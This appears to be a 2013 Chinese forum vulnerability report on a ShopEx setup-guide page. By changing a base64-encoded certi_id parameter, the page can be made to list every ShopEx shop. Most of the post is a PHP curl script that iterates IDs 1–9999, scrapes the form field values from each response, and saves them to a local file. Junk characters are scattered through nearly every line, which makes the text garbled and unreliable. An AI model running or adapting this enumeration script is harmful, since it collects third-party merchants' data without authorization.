|
|
简要描述:
; G1 _; H/ Q) eShopEx某接口缺陷,可遍历所有网站+ t9 }" X: u1 v/ A! i
详细说明:7 Z% g" J( G1 u, `' ~
问题出现在shopex 网店使用向导页面 9 _8 L/ [/ M8 m& U! y0 L
& N& [# l0 z6 F* K/ Z
7 A/ v1 T4 T9 H t) }
1 C' D- ?; j; S# X0 s4 d7 ^9 }http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
: v4 I5 r) W4 \& c2 h+ S+ x5 c& ~! {" l$ T) Z. z3 x( ^4 Z
3 r: n* O7 } L+ \9 x. f: K) |! N' Q6 L7 r# R" R2 V& O
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}: T" G9 E( ]0 l
8 O6 O) w$ G9 [' m ?
% {: f, U+ z2 H- H. ?
; x B; S) w! U8 ]9 G我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
$ t2 M+ f# R) i/ N2 @
+ U: o; m; S! ~1 Y
% B+ ^. `" c- e( F
+ q; S) }' k' b- ?3 U7 Y<?php) f$ Y( s+ L0 \1 k' L5 d/ l
5 ?6 e9 L# }: n3 I# y
for ($i=1; $i < 10000; $i++) { //遍历% g5 l! t) F% p1 `/ G* \' N+ i
8 W4 E1 Y4 @9 ] e ShowshopExD($i);6 M3 ~' C2 X/ M5 @# z
: C5 j7 m" r0 p }$ r) s3 b; j" |( n) K
, S/ b( I- z) n9 h& v. R function ShowshopExD($cid) {
! U2 i- r" T% @% E$ D5 m, Z% ]9 w7 u- G3 J* @1 ]3 F% O
$url='http://guide.ecos.shopex.cn/step2.php';# J5 A! C& u; s. @8 g1 r! I" S' q
) S$ q( t, G8 N* ~ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');7 u) v2 b# c2 T$ m
2 M/ l6 [. e! K6 x. x& i! m $url = $url.'?refer='.$refer;0 Z/ ]. J" P1 F ^' t `# e
: L+ a! L" l9 A6 \ $ch = curl_init($url);
' G- x2 ?5 B: e/ w& V# x( @1 m6 E5 O, }% Y* J, [& ~( h
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;: i% J+ Q! B4 t6 P5 C
$ f- e5 a8 d( \( U( v! e curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;7 a' e# ~& w7 B3 @/ E
: j( d6 H6 h0 J ?; Y# b$ `
$result = curl_exec($ch);
) c& @" n8 N5 ~2 @" S- q: [5 \+ T ?" W8 \0 s
$result = mb_convert_encoding($result, "gb2312", "UTF-8"); _* K! `0 {# [0 E) z* r/ m
$ e* Z- H% Q K" r$ v
if(strpos($result,$refer))
% D6 x+ i, y" R& B, S O7 T8 e) ?2 u# t; ~$ h
{
, V+ {5 k( A( f* a4 ?! G7 M8 J' ?' Z
) I4 R3 a6 k' U' D $fp = fopen("c:/shopEx.txt",'ab'); //保存文件' A% P: P& D0 O" Y( `
s3 J# r9 q/ ]
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
4 c$ l( A! v6 y+ G5 q1 m, @3 y% ?) k* d
foreach ($value[1] as $key) {
* E4 a& m5 R+ r
- v- P% J: R0 [ preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);& L: o9 o% H u8 A
' R, T# o1 S9 Z
echo $res[1][0].':'.$res[3][0]."\r\n";; @5 V) o9 Y) z5 H2 ~9 y E/ Y5 o
/ Q( C4 D7 @$ ?; e $col =$res[1][0].':'.$res[3][0]."\r\n";
+ t/ I; w- m; P. z# f4 R
' b; x `7 ` a( r. W8 [ fwrite($fp, $col, strlen($col));
) \ o, D% P% k$ @0 p
& g# f9 g9 T+ r# p. o. K }
$ [ c) V/ n# w u2 _/ K( K7 @' _
8 `% u& h1 S3 y( N echo '--------------------------------'."\r\n";) L+ I% C, f2 F: G3 d$ p1 r
( d+ V0 ]' F/ @$ c# p fclose($fp); % [7 z% x. D/ H( n, ^1 C/ P- p
2 y- a3 c% h; T, Q6 ^: U }
) |! M- k; W" ]! P/ s) V* x- O0 a8 u% o3 P: R# {) z( l/ ?
flush();
3 s( N3 g8 D) F: W
( f2 Q- c3 g2 Y9 w) j* Q, o curl_close($ch);
# x. r' m7 W1 H( w3 V6 q" B+ i+ x6 z: F; t2 E5 s w# e, y
}; k8 o$ C" A3 @4 V4 O
/ E8 `8 G7 b3 L# {4 j2 O P3 ?, ^( Q?>
' E- z. G: S4 p0 W" G; g V* s漏洞证明:0 z# A! n( o) g
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg* M+ a) }; J# y# x
refer换成其他加密方式2 {/ C% k8 n) C% r0 a, }
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对